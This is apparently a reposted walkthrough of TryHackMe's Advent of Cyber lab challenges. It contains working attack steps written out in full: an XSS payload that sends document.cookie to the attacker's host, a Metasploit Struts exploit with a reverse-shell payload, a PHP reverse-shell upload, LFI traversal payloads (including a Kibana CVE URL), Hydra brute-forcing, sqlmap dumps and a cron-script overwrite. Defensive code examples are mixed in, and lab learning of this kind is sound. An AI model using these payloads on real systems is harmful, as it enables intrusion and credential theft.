Advent of Cyber days25 THM

Good day and merry Christmas, welcome to another THM CTF write-up. This is a special event created by THM where users have to solve all 24 tasks. The room is designed for beginners who want to learn the basics of hacking and pentesting: the tasks are easy, come with supporting material, and suit people with absolutely zero hacking knowledge. After the THM hackback 2019 write-up this one is going to be tedious, so bear with me. You can click on the permalink to jump to a specific challenge. Let’s get started.

Day 1 (Task 6) – Hacking the cookie

The first task of the challenge is about hijacking a session by altering the cookie value. Register and log in first; I named my account mama. After that, press F12 and find the cookie.


For your information, the value is encoded with base64.


The first few characters contain the username mama while the rest is gibberish. Now, we are going to create a longer username like hijackingthecookie.


Comparing it with the previously decoded cookie, the last 11 characters (censored) are fixed. To hijack mcinventory’s account, simply base64-encode the following text.

mcinventory<the last 11 characters>

Copy the encoded text and paste it in as the cookie value.


Refresh the page and you are inside mcinventory’s account.

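Why the hijack works, and what the server should have done: an added Python example of mine (not the room’s code; the 11-character suffix is a made-up stand-in) that reproduces the forgeable base64(username + constant) layout next to an HMAC-signed cookie the server can actually verify.

```python
import base64
import hashlib
import hmac
import secrets

# Constructed stand-in for the room's cookie layout as the write-up describes it:
# base64(username + fixed suffix). The suffix value itself is made up.
FIXED_SUFFIX = "SUFFIXFIXED"   # hypothetical 11-character constant


def issue_unsigned(username: str) -> str:
    """Build a cookie the way the challenge app does: no secret involved."""
    return base64.b64encode((username + FIXED_SUFFIX).encode()).decode()


def forge_unsigned(observed_cookie: str, target_user: str) -> str:
    """Anyone who has seen one cookie can mint one for another user."""
    decoded = base64.b64decode(observed_cookie).decode()
    suffix = decoded[-len(FIXED_SUFFIX):]
    return base64.b64encode((target_user + suffix).encode()).decode()


# Hardened variant: bind the value to a server-side secret with an HMAC.
SERVER_KEY = secrets.token_bytes(32)   # generated at startup, never sent to the client


def issue_signed(username: str, key: bytes = SERVER_KEY) -> str:
    payload = base64.urlsafe_b64encode(username.encode()).decode()
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_signed(cookie: str, key: bytes = SERVER_KEY):
    """Return the username if the tag checks out, otherwise None."""
    try:
        payload, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    return base64.urlsafe_b64decode(payload.encode()).decode()


def splice_user(signed_cookie: str, new_user: str) -> str:
    """The same trick tried against the signed scheme: swap the payload, keep the tag."""
    tag = signed_cookie.rsplit(".", 1)[1]
    return base64.urlsafe_b64encode(new_user.encode()).decode() + "." + tag
```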

Day 2 (Task 7): Directory brute-force and OSINT

This task involves two elements: directory brute-force and OSINT. For this write-up, I’m going to use gobuster with the following command.

gobuster dir -u http://<machine IP>:3000 -w /usr/share/dirb/wordlists/common.txt

One particular directory catches our interest. Visiting the hidden directory and reading the source code, we get the following.


Time to do a little bit of OSINT. Visit the legit GitHub site and search for arctic digital design.


We just hit the jackpot. Read the repo and you should find something interesting.


Use the credential and login to the admin portal. Don’t forget to read the message.


Day 3 (Task 8): Reading packet

Download the packet capture and open it in Wireshark. Read packet ID 998 for the sake of the challenge.


Time to find something useful. To make things simple, it is good to follow the TCP stream: select any TCP packet, right-click and choose Follow TCP Stream.


All the information for the challenge is located on stream 1.


To crack Buddy’s hashed password, simply punch in the following command (by referring to the hashcat example hashes, the hash is sha512crypt).

hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt

If you are running hashcat in a VM, add the --force flag.

Day 4 (Task 9): Linux challenge

This task is going to test your understanding of Linux commands. Refer to the supporting material if you want to know more. Log in to the machine via SSH.

Task9-1: visible files


Task9-2: Read a file


Task9-3: File the strings


Task9-4: Find the IP address


Task9-5: Check user


Task9-6: File integrity


Task9-7: Finding the hash

For your information, all users’ password hashes are stored in /etc/shadow. The problem is, you can’t simply read the file due to its permissions. Sometimes, though, you can find a backup somewhere inside the system folders.


We have permission to read the backup file.


Day 5 (Task 10): OSINT

Download the picture and examine the metadata using ExifTool.


We found a small piece of information: the creator’s name. A quick Google search on the name yields the following Twitter page.


Visiting the WordPress site of elf Lola redirects us to the following page.


The problem is, how do we know which photograph Lola published first? Ever heard of the Wayback Machine, where people dig up old versions of pages? Paste the link into the Wayback Machine and you get the following list of archives.


The earliest date is in October. Click on the date and visit the archived page.


Something is different compared to the latest version. To check the lazy name, click on the picture or do a reverse image search with TinEye.


Day 6 (Task 11): Extract files from the packet

Download the file and open it in Wireshark. Examine the UDP stream by right-clicking any DNS packet.


Looking at streams 2, 3, 4 and 5, you will come across something interesting.


The data is encoded as base16, i.e. hex. After that, in Wireshark navigate to File -> Export Objects -> HTTP and download the two files (.zip and .jpg).


The zip is password protected. Use fcrackzip or john to crack the password. In this case, I used john.

zip2john christmaslists.zip > hash
john hash

There is another file hidden inside the Tryhackme.jpg. Use steghide (without the password) to extract the file.

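Hex-encoded data riding in DNS query names, as seen in streams 2 to 5, is a pattern a defender can flag automatically. Added Python example of mine (not part of the room; every query name below is constructed) that picks out long hex-only labels from a list of DNS query names and reassembles the bytes they carry.

```python
import binascii
import re
from typing import List, Tuple

# Constructed sample of DNS query names, modelled on the challenge capture where file
# contents travelled as hex-encoded labels (every name here is made up).
SAMPLE_QUERIES = [
    "www.tryhackme.com",
    "504b030414000000080000000000.exfil.example",   # chunk 1: starts with the zip magic bytes
    "7468697320697320612074657374.exfil.example",   # chunk 2: ASCII text in hex
    "mail.example.net",
    "deadbeef.example",                             # short hex-looking label, below threshold
]

HEX_LABEL = re.compile(r"^[0-9a-fA-F]+$")
MIN_LEN = 16   # shorter hex labels are too often legitimate ids or hashes


def hex_labels(qname: str, min_len: int = MIN_LEN) -> List[str]:
    """Return the labels of a query name that look like hex-encoded payload."""
    return [lab for lab in qname.split(".")
            if len(lab) >= min_len and len(lab) % 2 == 0 and HEX_LABEL.match(lab)]


def detect(queries: List[str]) -> Tuple[List[str], bytes]:
    """Flag suspicious query names and reassemble, in capture order, the bytes they carry."""
    flagged, payload = [], b""
    for q in queries:
        labs = hex_labels(q)
        if labs:
            flagged.append(q)
            payload += b"".join(binascii.unhexlify(lab) for lab in labs)
    return flagged, payload


if __name__ == "__main__":
    names, data = detect(SAMPLE_QUERIES)
    print(len(names), "suspicious queries;", len(data), "bytes recovered")
```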

Day 7 (Task 12): Nmap

Launch your Nmap scanner with the following command.

nmap -p0-1000 -A -v <machine IP>

Read everything available on the result screen and submit the answers.


Don’t forget to check Port 999. There is something inside the server.

Day 8 (Task 13): SUID file exploit

Do an Nmap fast scan using the following command.

nmap -p- -v --min-parallelism 100 <machine IP>

Looks like we have something on port 65534; a further scan of that port shows it is SSH. Log in to the machine via SSH with the following command.

ssh -p 65534 holly@<machine IP>

After that, search for SUID files.

find / -perm /4000 2>/dev/null

We found something interesting in the list of findings. By checking the find entry on GTFOBins, we can escalate to user igor.


To escalate to root, we need to find a suspicious SUID file. Looking at the timestamps, we find a SUID binary created around the time the machine was built.


Let’s run the command.


We can literally do anything as the root by running the binary.

Day 9 (Task 14): Python requests

Visiting the website returns a JSON result. Copy the following script and run it with Python.

import requests
import json

path = "f"
value = ""
host = "https://10.10.112.87:3000/"
# Follow the chain: each JSON response holds one fragment of the answer
# and the path of the next one, until "next" is "end"
while True:
    response = requests.get(host + path)
    dict_data = json.loads(response.text)
    path = dict_data["next"]
    if path == "end":
        break
    value = value + dict_data["value"]
print(value)

Day 10 (Task 15): Metasploit

First of all, perform an Nmap scan and look for any open ports.


Looks like we have a web server running on the machine. After that, do a Nikto scan on the web server and look for any vulnerability.


The server is vulnerable to Struts-Shock, CVE-2017-5638. Checking the CVE details, the vulnerability lies in the Jakarta Multipart parser in Apache Struts. Fire up Metasploit with the following command.

msfconsole

After that search for struts2 modules.


We have located the exploit module. Use the module with the following configuration.

msf5 > use exploit/multi/http/struts2_content_type_ognl
msf5 > set RHOST <machine IP>
msf5 > set RPORT 80
msf5 > set TARGETURI /showcase.action
msf5 > set payload linux/x86/meterpreter/reverse_tcp
msf5 > exploit

And we get a shell. Enumerate your way to /home/santa to capture the credentials. Remember, the machine you are currently exploiting is inside a Docker container, which means you do not fully control the host even as root. There is a way to escape the container; visit this room to learn more.

Login to the SSH with the newly captured credentials. To extract the specific line from the file, simply input the following command.

sed '100q;d' naughty_list.txt

The above command extracts the 100th line from naughty_list.txt. Give it a try!

Day 11 (Task 16): Accessing the file system

Task 16-1: NFS

Check the NFS exports of the server with the following command.

showmount -e <machine IP>

To mount the NFS share, first create a directory named nfs, then mount the share with the following command.

mount <machine IP>:/opt/files /root/Desktop/THM/xmas/nfs

Remember to unmount the NFS share after you are done with the challenge.

umount -f -l nfs

Task 16-2: FTP

Visit the FTP server with the following command.

ftp <machine IP>

Log in to the server with user anonymous with a blank password.


Download the file with get and read the txt file for the SQL username and password.

Task 16-3: MySQL

Login to the SQL server with the following command.

mysql -u <username> -h 10.10.149.117 -p<password>

Make sure -p is attached directly to the password (no space). After that, navigate to and read the flag with the following SQL commands.

mysql > SHOW DATABASES;
mysql > USE data;
mysql > SELECT * FROM USERS;

Day 12 (Task 17): File decryption

Download and unzip the file. To compute an MD5 checksum of the first file, simply use this command.

md5sum note1.txt.gpg

Punch in the following command to decrypt the GPG file.

gpg note1.txt.gpg

The password is 25daysofchristmas

To decrypt the asymmetrically encrypted file with the private key, use the following command.

openssl rsautl -decrypt -inkey private.key -in note2_encrypted.txt -out note2.txt

The password is hello.

Day 13 (Task 18): Capture the flag

This task was created by darkstar. I call it CTF as it involves some enumeration, exploitation and privilege escalation. You might encounter bugs while performing the recon and the exploit. First and foremost, let’s do a full scan on the server with ping skipped.

nmap -Pn -A -v <machine IP>

We have two services running on the machine, specifically port 80 (HTTP) and port 3389 (RDP). Let’s do a visit to the HTTP server.


A default Windows Server welcome page. Huh… nothing we can do here except brute-forcing the server’s directories. Time to fire up gobuster.

gobuster dir -u <machine IP> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Alright, we got an interesting directory called /retro. Let’s do some reading on the blog. After a short recon, I stumbled across the following in one of the blog posts.


It could be the password for the web server. Actually it is: you can log in to the WordPress dashboard with the username wade and that password.


Stop right there! There is nothing you can do from the WordPress dashboard, including generating a reverse-shell page. Still, remember we have one more service yet to explore, the RDP. For this task, I’m going to use Remmina instead of rdesktop, because I had problems connecting to the server with rdesktop.

Use the username wade and the password you just found to log in to the RDP service.


We are now inside the desktop. If you open up Google Chrome and check the bookmark bar, you come across a CVE number.


After a short Google search on the CVE, I came across the following GIF, which explains how the exploit works. The executable is located inside the Recycle Bin; restore and run it. However, you will get the infamous greyed-out OK button that stops you from proceeding with the exploit.


A big thanks to the creator of the room, darkstar. The grey button is intended as part of the challenge. The author mentioned that Chrome is installed and set as the default browser for the administrator user, and this setup causes a glitch in Windows Server 2016. There is a consistent fix for the glitch: open both the Chrome and IE browsers and then launch the exploit.

Darkstar also mentioned two other usual ways of fixing the bug:

  1. Pure luck (my situation)
  2. Spamming the OK button

I have tested the fix mentioned by darkstar above, and it works like a charm.


Day 14 (Task 19): AWS

Since we have the bucket name, it makes things quite simple. Visit the following URL.

http://advent-bucket-one.s3.amazonaws.com/

After that read the content inside the text file.


Day 15 (Task 20): Local file inclusion (LFI)

Visit the website and look at the source code.


Looks like the server pulls the text file from the view/notes directory. Take note of the URL path in charge of pulling the file, /get-file/. We need to draft a URL that pulls /etc/passwd from the server.

http://<machine IP>/get-file/../../../../../../../../../etc/passwd

Put in as many parent-directory references (../) as you like, the more the better; we are doing directory traversal now.


We have a situation right now: the traversal is filtered. To bypass the filter, try URL encoding by changing ‘/’ into %2f.

http://<machine IP>/get-file/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Now we’re talking. Find charlie’s hash in the shadow file.


Copy the hash and crack it using hashcat.

hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt --force

After cracking the hash, log in to Charlie’s SSH shell and capture the flag.

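Why stripping ‘../’ from the raw URL failed: the check ran before decoding, so ..%2f passed through untouched. Added Python example of mine (not the room’s code; the notes directory path is hypothetical) reproducing the naive filter and the decode-then-canonicalise check that actually contains the path.

```python
import os
from urllib.parse import unquote

# Hypothetical location of the notes the /get-file/ handler serves.
BASE_DIR = os.path.realpath("/var/www/view/notes")


def naive_filter(requested: str) -> str:
    """Mimics the challenge's check: strip '../' from the raw request, then decode and
    join. Anything written as ..%2f survives the strip and is decoded afterwards."""
    cleaned = requested.replace("../", "")
    return os.path.normpath(os.path.join(BASE_DIR, unquote(cleaned)))


def safe_resolve(requested: str):
    """Decode first, canonicalise, then refuse anything whose real path leaves BASE_DIR.
    Returns the absolute path to read, or None if the request must be rejected."""
    decoded = unquote(requested)
    candidate = os.path.realpath(os.path.join(BASE_DIR, decoded))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None   # traversal, or an absolute path that replaced the base in join()
    return candidate


if __name__ == "__main__":
    for req in ("note1.txt", "../../../../../etc/passwd", "..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"):
        print(f"{req!r:45} naive -> {naive_filter(req)}   safe -> {safe_resolve(req)}")
```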

Day 16 (Task 21): Python file system

You are required to write Python to unzip the archives, count the files and search their content. Make sure you understand the code.

Task 21-1: Count the number of the unzipped file

The following is the python code for the task.

import zipfile
import os

count = 0
# Extract the primary file
with zipfile.ZipFile('final-final-compressed.zip', 'r') as zip_decom1:
    zip_decom1.extractall('decom1')
# Read and extract each zip file to decom2
ListFile = os.listdir('decom1')
for l in ListFile:
    with zipfile.ZipFile('decom1/' + l, 'r') as zip_decom2:
        zip_decom2.extractall('decom2')
# Calculate the number of files (exclude .zip)
ListFile = os.listdir('decom2')
for l in ListFile:
    if 'zip' not in l:
        count = count + 1
print("Number of extracted file: " + str(count))

Task 21-2: Find the file with specific metadata

This task requires the challenger to find the number of files labeled with Version 1.1.

import os
import exiftool   # PyExifTool 0.4 API: ExifTool().get_metadata_batch()

m_count = 0
file = []
# Read all the metadata in decom2 and scan for 'Version 1.1' metadata
ListFile = os.listdir('./')
for l in ListFile:
    file.append(l)
with exiftool.ExifTool() as et:
    metadata = et.get_metadata_batch(file)
for d in metadata:
    try:
        # count only files whose XMP Version tag reads 1.1
        if str(d[u'XMP:Version']) == '1.1':
            m_count = m_count + 1
    except KeyError:
        continue
print("Number of files in version 1.1: " + str(m_count))

Put the script inside the decom2 directory.

Task 21-3: Find the file with specific content

Your task is to find the file with the string, ‘password’.

import os

# Read all files in decom2 and find the ones containing 'password'
ListFile = os.listdir('decom2')
for l in ListFile:
    with open('decom2/' + l, 'r', errors='ignore') as f:
        data = f.read()
    if "password" in data:
        print(l)
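Nested extractall() trusts every entry name in the archive, so a crafted member such as ../x can write outside the target directory (zip slip). Added Python example of mine (not the room’s code; the archive is built in memory and its contents are made up) that extracts nested zips while rejecting escaping entries, then counts the files and greps them the way the three tasks ask.

```python
import io
import os
import tempfile
import zipfile


def build_sample_archive() -> bytes:
    """Constructed test input: an outer zip holding one inner zip and one zip-slip entry."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("note1.txt", "nothing here\n")
        z.writestr("note2.txt", "the password is hunter2\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("batch1.zip", inner.getvalue())
        z.writestr("../escape.txt", "should never land outside dest\n")
    return outer.getvalue()


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Extract only members whose resolved path stays inside dest; recurse into nested zips.
    Returns the member names that were rejected."""
    dest = os.path.realpath(dest)
    os.makedirs(dest, exist_ok=True)
    rejected = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            target = os.path.realpath(os.path.join(dest, info.filename))
            if os.path.commonpath([dest, target]) != dest:
                rejected.append(info.filename)   # zip-slip attempt, skip it
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            data = z.read(info)
            if info.filename.lower().endswith(".zip"):
                rejected += safe_extract(data, dest)   # nested archive, same rules
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as f:
                    f.write(data)
    return rejected


def count_and_grep(dest: str, needle: str = "password"):
    """Return (number of extracted regular files, names of those containing needle)."""
    hits, total = [], 0
    for name in sorted(os.listdir(dest)):
        path = os.path.join(dest, name)
        if not os.path.isfile(path):
            continue
        total += 1
        with open(path, "r", errors="ignore") as f:
            if needle in f.read():
                hits.append(name)
    return total, hits


def demo():
    """Run the whole pipeline in a fresh temp directory: (rejected, file count, hits)."""
    dest = tempfile.mkdtemp()
    rejected = safe_extract(build_sample_archive(), dest)
    total, hits = count_and_grep(dest)
    return rejected, total, hits


if __name__ == "__main__":
    print(demo())
```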

Day 17 (Task 22): Hydra

Task 22-1: Brute-force the HTTP-post-form

The hint is a joke, do not trust it. The password is located around the 900k+ mark in rockyou.txt. I will make another exception for this task by revealing the password.

hydra -l molly -p joyness1994 <machine IP> http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

Log in with molly’s credentials on the web page and capture the flag.


Task 22-2: Brute-force the SSH

Use the following command to brute-force the SSH service.

hydra -t 64 -l molly -P /usr/share/wordlists/rockyou.txt ssh://<machine IP>

Log in to the server and capture the flag.


Day 18 (Task 23): Stealing the cookie

There are a lot of ways to solve this task. For my approach, I’m going to create a PHP script and steal the admin cookie. For simplicity, the script contains one single line and is extremely unrealistic.

<?php
$cookie = $_GET["c"];
?>

After that, launch the PHP server (run the command inside the directory contains the PHP script) to listen to any incoming request.

php -S <tun IP>:8000

Make sure you change the tun IP according to your own VPN IP in THM. After that, register yourself on the web server and inject the following script in the comment section.

<script>document.location='https://<tun IP>:8000/cookie.php?c='+document.cookie;</script>

Change the tunnel IP too.


Wait for 2 minutes and the admin’s cookie will show up on your screen.

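The cookie leaves the browser because the comment is rendered unescaped and the session cookie is readable from script. Added Python example of mine (not the room’s code; the payload string is a constructed copy of the pattern above with a placeholder host) showing the output encoding and the HttpOnly/Secure attributes that stop this.

```python
import html
from http.cookies import SimpleCookie

# Constructed copy of the injected comment, with a placeholder host.
COMMENT_PAYLOAD = (
    "<script>document.location='http://attacker.invalid:8000/cookie.php?c='"
    "+document.cookie;</script>"
)


def render_comment_unsafe(comment: str) -> str:
    """What the challenge page does: user text dropped straight into the HTML."""
    return f"<p class='comment'>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Encode for the HTML text context; the browser shows the tags, it never runs them."""
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value with the attributes that keep document.cookie from exposing it.
    HttpOnly hides it from script, Secure keeps it off plain HTTP, SameSite limits
    cross-site sends."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()


if __name__ == "__main__":
    print(render_comment_safe(COMMENT_PAYLOAD))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```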

Day 19 (Task 24): Command injection

Almost similar to the local file inclusion (task 20), you are going to play around with the URL. For starters, let’s test the injection with the following URL.

http://<machine IP>:3000/api/cmd/ls

The result contains a listing of the root of the file system. After a small recon, the flag is located at /home/bestadmin.


Read the file and capture the flag.

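The endpoint hands whatever follows /api/cmd/ to a shell. Added Python example of mine (not the room’s code; the allow-listed actions are made up) contrasting that pattern with a fixed-argv allow list run without a shell, where user text can only select an action, never become part of a command.

```python
import subprocess


def run_cmd_unsafe(user_input: str) -> str:
    """Mirror of the challenge endpoint: the URL suffix is handed to /bin/sh as-is,
    so shell metacharacters (; | && $()) are interpreted."""
    out = subprocess.run(user_input, shell=True, capture_output=True, text=True)
    return out.stdout


# Hypothetical allow list: each action maps to a complete, fixed argv.
ALLOWED = {
    "list": ["ls", "-1", "."],
}


def run_cmd_safe(action: str):
    """Look the action up; unknown keys are refused rather than interpreted.
    shell=False means argv goes straight to execve, with no shell parsing at all."""
    argv = ALLOWED.get(action)
    if argv is None:
        return None
    out = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    print(repr(run_cmd_unsafe("echo hello; echo injected")))   # both commands run
    print(run_cmd_safe("list; id"))                             # None: refused
```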

Day 20 (Task 25): Cronjob

First and foremost, do an Nmap scan.

nmap -p4000-5000 -A -v <machine IP>

Looks like we have an SSH service running on port 4567. As for the next task, we need to brute-force the service with the username sam.

hydra -s 4567 -t 64 -l sam -P /usr/share/wordlists/rockyou.txt ssh://<machine IP>

We got the password. Time to log in to the shell.


There is one particular script in /home/scripts that raises suspicion to us. Let’s read the content.


The script just does some cleaning of /tmp. How does that look suspicious? Let’s check the timestamp of /tmp.


Did you see the time difference? It is very close. My hypothesis is that clean_up.sh is in user ubuntu’s cron job list. Let’s see what our permissions are on the script.


Well, we can tamper with the script as a low-privilege user. For your information, you can’t escalate to root yet because the file belongs to ubuntu. You can use the following command to pull the flag from ubuntu’s home.

echo "cat /home/ubuntu/flag2.txt > /home/scripts/flag2.txt" > clean_up.sh
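The weakness here is a cron-driven script that another user can edit. Added Python example of mine (not the room’s; the crontab text is constructed and the two scripts are created in a temporary directory) that parses crontab lines and reports scripts writable by group or world, the check that would have caught clean_up.sh.

```python
import os
import stat
import tempfile

# Constructed crontab excerpt in the shape of the challenge (user ubuntu running a clean-up script).
CRONTAB = """\
# m h dom mon dow command
*/2 * * * * /home/scripts/clean_up.sh
0 3 * * * /usr/local/bin/backup.sh --quiet
"""


def scripts_from_crontab(text: str) -> list:
    """Return the command paths from non-comment crontab lines (5 time fields, then the command)."""
    paths = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) == 6:
            paths.append(fields[5].split()[0])
    return paths


def writable_by_others(path: str) -> bool:
    """True if group or world may write the file: the condition sam abused."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(crontab_text: str, path_map: dict = None) -> list:
    """Report cron scripts that a non-owner could edit. path_map redirects paths for the demo."""
    findings = []
    for p in scripts_from_crontab(crontab_text):
        real = (path_map or {}).get(p, p)
        if os.path.exists(real) and writable_by_others(real):
            findings.append(p)
    return findings


def demo() -> list:
    """Create one loose (0777) and one strict (0755) script in a temp dir and audit them."""
    d = tempfile.mkdtemp()
    loose = os.path.join(d, "clean_up.sh")
    strict = os.path.join(d, "backup.sh")
    for path, mode in ((loose, 0o777), (strict, 0o755)):
        with open(path, "w") as f:
            f.write("#!/bin/sh\n# placeholder body\n")
        os.chmod(path, mode)
    return audit(CRONTAB, {"/home/scripts/clean_up.sh": loose,
                           "/usr/local/bin/backup.sh": strict})


if __name__ == "__main__":
    print(demo())
```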

Day 21 (Task 26): Reverse engineering (basic)

I’m going to use the IDA reverse engineering tool for the entire RE challenge. You can refer to my ELF RE write-up to learn more about IDA. Check challenge1 for the challenge; file1 is a decoy.

Task 26-1: static analysis


Task 26-2: Debugging 1

Put a breakpoint (Pressing F2) after imul instruction.


Run the program (green play button) and hover over the eax register for the answer.

Task 26-3: Debugging 2

Put a breakpoint (Pressing F2) before the pop instruction.


Run the program (green play button) and hover over var_4 or eax for the answer.

Day 22 (Task 27): Reverse engineering (conditional)

This RE task involves an if conditional.


The branch translates as:

var_8 = 8
var_4 = 2
if (var_8 < var_4) {
    var_4 += 7
} else {
    var_8 += 1
}

Since var_8 is always bigger than var_4, the if condition is false. The branch follows the red arrow. By working this through, you should get the answers.

Day 23 (Task 29): SQL injection

For this SQLi, I’m going for the easy way. First and foremost, launch Burp Suite and visit the LapLand login page. After that, try to log in as a random user (invalid credentials) and capture the request in Burp Suite.


Copy the request and save it as r.txt. After that, run the following command to start the injection and find out the list of possible databases.

sqlmap -r r.txt --dbs --batch

We got one particular parameter that is vulnerable to the injection. After a short run, we are able to determine the databases. The next step is to list all the tables inside the database (name censored) with the following command.

sqlmap -r r.txt -D <Censored DB name> --tables --batch

Looks like we found a list of tables. For this time being, we are only interested in the last table. As for the next step, enumerate the content inside the table.

sqlmap -r r.txt -D <Censored DB name> -T <Censored table name> --columns --batch

Let’s pull some data from the columns. You are required to use --dump.

sqlmap -r r.txt -D <Censored DB name> -T <Censored table name> -C email,username,password --batch --dump

We just found Santa’s email and hashed password in the database. I strongly recommend you skip the hash-cracking part: simply copy Santa’s MD5 hash and crack it using an online tool. Now we are able to log in to Santa’s social account.


By the way, there is one secret inside Santa’s inbox.

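The login form is injectable because the username is pasted into the query text. Added Python example of mine (not the room’s code; the table, row and hashes are constructed, and MD5 is kept only because that is what the challenge database stored) showing the vulnerable query beside the parameterised one, with an in-memory SQLite database standing in for the real one.

```python
import hashlib
import sqlite3


def md5_hex(password: str) -> str:
    # MD5 mirrors the challenge database only; a real login should use bcrypt or argon2.
    return hashlib.md5(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("santa@northpole.example", "santa", md5_hex("not-the-real-one")))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the SQL by string formatting: the username text becomes part of the query,
    so a quote in it ends the literal and the rest is parsed as SQL."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{md5_hex(password)}'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Bound parameters: the driver passes values separately, never as SQL text."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, md5_hex(password))).fetchone()


if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, "santa' --", "anything"))
    print("safe:      ", login_safe(db, "santa' --", "anything"))
```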

Alright, time for a reverse shell. First, download the PHP reverse-shell payload from this page. Save the file as .phtml instead of .php, as the standard PHP extension is filtered by the page. Before uploading and submitting the payload, make sure you have the listener open in your terminal.

nc -lvnp 1234

After uploading the file, locate the following URL.

http://<machine IP>/assets/images/posts/

Click on the .phtml file we just uploaded and listen to the shell.


The flag is located in /home/user.


Day 24: ELF (Elastic Search, Kibana and Log Stash )

First and foremost, launch your Nmap scanner.

Looks like we found port 22 (SSH), port 8000 (HTTP) and port 9200 (Elasticsearch) on the target machine. For your information, you can’t log in to SSH; the only ways in are port 8000 and port 9200. Let’s do a check on port 9200.

There is good material to kick-start with port 9200. To pull the password from the database, simply do a query search.

http://<machine IP>:9200/_search?q=password

There is nothing you can do with the credential, so let’s proceed to port 8000. On that port, there is something called the Kibana log. Looking at the log, I stumbled across another open service on port 5601.


After doing the Nmap scan, port 5601 can be accessed via the browser.


Let’s check the version in the management tab.


After a quick Google search on the Kibana version, I came across the LFI vulnerability CVE-2018-17246. I tried the following payload URL to validate the vulnerability.

http://<machine IP>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../../etc/passwd

After that, revisit the log file from port 8000, you will notice something interesting.


We just read the content of /etc/passwd; the vulnerability is confirmed. As for the flag, it is located at the root of the file system (not in the /root directory).

http://<machine IP>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../../root.txt

It is hard to locate the flag as it only contains a few letters. Well, actually there are other ways, using the console.

Conclusion

This is it, congratulations on completing all 24 tasks. What a challenge! A big thanks to THM and the task creators who built challenges we didn’t deserve. Good job and keep on keeping on; I look forward to the next Advent of Cyber challenge. Until next time ^^ and happy new year.

This article was published by 泓源视野 author admin, and its copyright belongs to 泓源视野. The content represents the author’s personal views and does not imply that 泓源视野 agrees with or supports them. Please credit the source when reposting.